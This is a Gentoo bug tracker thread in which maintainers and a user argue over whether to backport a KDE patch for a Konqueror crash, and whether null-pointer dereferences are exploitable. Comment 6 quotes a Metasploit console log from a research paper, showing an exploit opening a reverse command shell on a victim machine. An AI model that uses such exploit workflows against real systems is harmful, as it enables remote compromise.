Bug 208238 - please apply upstream's patch for acid3 in konqueror
Summary: please apply upstream's patch for acid3 in konqueror
Status: VERIFIED WONTFIX
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: [OLD] KDE (show other bugs)
Hardware: All Linux
Importance: High normal
Assignee: Gentoo KDE team
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2008-01-30 22:26 UTC by Jan Kundrát (RETIRED)
Modified: 2009-08-26 08:29 UTC

See Also:
Package list:
Runtime testing required: ---


Description Jan Kundrát (RETIRED) gentoo-dev 2008-01-30 22:26:58 UTC
Per upstream's bug http://bugs.kde.org/155451 -- Konqueror crashes when viewing the Acid3 test page. Patch that fixes the issue is at http://websvn.kde.org/?view=rev&revision=761357 .
Comment 1 Wulf Krueger (RETIRED) gentoo-dev 2008-02-09 22:58:29 UTC
KDE 3.5.9 will be tagged in 4 days and released a week later. So this bug will get resolved soon but LATER. :-)
Comment 2 Anton Bolshakov 2008-03-07 14:02:29 UTC
I'm wondering why you don't want to fix it NOW.
A crash is a serious security vulnerability which might lead to remote (in this case) system compromise. The patch is really simple:
http://websvn.kde.org/branches/KDE/3.5/kdelibs/khtml/ecma/kjs_traversal.cpp?r1=761357&r2=761356&pathrev=761357
IMHO it should be fixed in the current stable version unless KDE 3.5.9 will be tagged as stable in a few days. Please review the issue.
Comment 3 Jan Kundrát (RETIRED) gentoo-dev 2008-03-10 08:49:45 UTC
(In reply to comment #2)
> Crash is a serious security vulnerability which might lead to remote (in this
> case) system compromise.

How exactly is a null-pointer dereference a gateway to remote code execution?
Comment 4 Anton Bolshakov 2008-03-10 09:53:43 UTC
I never tried it myself, but a quick search for "exploitable null-pointer" shows that it's possible to control this null pointer under some conditions. For example, http://securityreason.com/securityalert/2286
Since we are not sure, why don't we just fix it?
Comment 5 Anton Bolshakov 2008-03-10 11:27:56 UTC
Here is an even better reference:
https://www.owasp.org/index.php/Null-pointer_dereference
Severity: Medium
Likelihood of exploit: Medium
Comment 6 Anton Bolshakov 2008-03-10 12:03:39 UTC
Sorry for the spam, but I've found the original paper:

Exploiting the Otherwise Unexploitable
http://uninformed.org/?a=5&t=txt&v=4

Abstract: This paper describes a technique that can be applied in
certain situations to gain arbitrary code execution through software
bugs that would not otherwise be exploitable, such as NULL pointer
dereferences <.. skip ..> in Internet Explorer to gain arbitrary code execution 

The following example shows this proof of concept in action:
msf exploit(windows/browser/ie_unexpfilt_poc) > exploit
[*] Started reverse handler
[*] Using URL: http://x.x.x.x:8080/FnhWjeVOnU8NlbAGAEhjcjzQWh17myEK1Exg0
[*] Server started.
[*] Exploit running as background job.
msf exploit(windows/browser/ie_unexpfilt_poc) >
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (x.x.x.x:4444 -> y.y.y.y:1059)

msf exploit(windows/browser/ie_unexpfilt_poc) > session -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\mmiller\Desktop>
Comment 7 Jan Kundrát (RETIRED) gentoo-dev 2008-03-10 19:24:12 UTC
(In reply to comment #6)
> Exploiting the Otherwise Unexploitable
> http://uninformed.org/?a=5&t=txt&v=4

...except that a null-pointer dereference doesn't generate an exception, but results in immediate termination of the process in question.
Comment 8 Anton Bolshakov 2008-04-19 09:16:16 UTC
A new way of exploiting null-pointer exception has been discovered:
http://www.matasano.com/log/1032/this-new-vulnerability-dowds-inhuman-flash-exploit/
http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf
Comment 9 Tomáš Chvátal (RETIRED) gentoo-dev 2009-08-09 11:42:57 UTC
bugzie.
Comment 10 Tomáš Chvátal (RETIRED) gentoo-dev 2009-08-09 11:43:19 UTC
No need to patch something to pass a synthetic test.
Comment 11 Anton Bolshakov 2009-08-19 02:07:54 UTC
(In reply to comment #10)
> No need to patch something to pass a synthetic test.
> 

The summary is not accurate: konqueror crashes during the test which might lead to remote compromise.

(In reply to comment #3)
> How exactly is a null-pointer dereference a gateway to remote code execution?

Well, one year later, here we are:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2692
http://www.milw0rm.com/exploits/9477
It all started from adobe flash null pointer exploit btw.

Do you still want to accept the risk and not apply a trivial patch?
Since then security patches marked as "wontfix" in Gentoo ???
Comment 12 Jan Kundrát (RETIRED) gentoo-dev 2009-08-26 08:29:15 UTC
> (In reply to comment #3)
> > How exactly is a null-pointer dereference a gateway to remote code execution?
> 
> Well, one year later, here we are:
> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2692
> http://www.milw0rm.com/exploits/9477
> It all started from adobe flash null pointer exploit btw.

Right, I stand corrected. Note that a NULL pointer dereference in the kernel is different from one in userspace, AFAIK.

> Do you still want to accept the risk and not apply a trivial patch?
> Since then security patches marked as "wontfix" in Gentoo ???

The bug in question was reported against KDE 3.5.8. We have had 3.5.10 for ages, so the bug is fixed.